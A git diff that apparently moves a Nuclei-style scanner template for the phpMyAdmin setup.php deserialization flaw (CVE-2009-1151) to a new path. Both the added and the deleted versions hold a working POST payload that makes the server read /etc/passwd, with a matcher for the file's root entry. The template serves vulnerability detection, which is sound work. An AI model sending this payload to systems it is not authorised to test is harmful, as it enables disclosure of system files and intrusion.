diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml new file mode 100644 index 0000000000..056bd4e4e7 --- /dev/null +++ b/cves/2009/CVE-2009-1151.yaml @@ -0,0 +1,35 @@ +id: CVE-2009-1151 + +info: + name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability + author: princechaddha + severity: high + description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. + reference: https://www.phpmyadmin.net/security/PMASA-2009-3/ + vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 + tags: phpmyadmin,rce,deserialization + +requests: + - raw: + - | + POST /scripts/setup.php HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Connection: close + Content-Type: application/x-www-form-urlencoded + Content-Length: 80 + + action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:[x*]:0:0:" \ No newline at end of file diff --git a/vulnerabilities/other/phpmyadmin-setup-deserialization.yaml b/vulnerabilities/other/phpmyadmin-setup-deserialization.yaml deleted file mode 100644 index 2ee56b7fae..0000000000 --- a/vulnerabilities/other/phpmyadmin-setup-deserialization.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: phpmyadmin-setup-deserialization -info: - name: phpmyadmin Scripts/setup.php Deserialization Vulnerabilityn - author: princechaddha - severity: high - reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 - tags: phpmyadmin,rce - -requests: - - method: POST - path: - - "{{BaseURL}}/scripts/setup.php" - body: 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}' - - matchers: - - type: regex - regex: - - "root:[x*]:0:0:"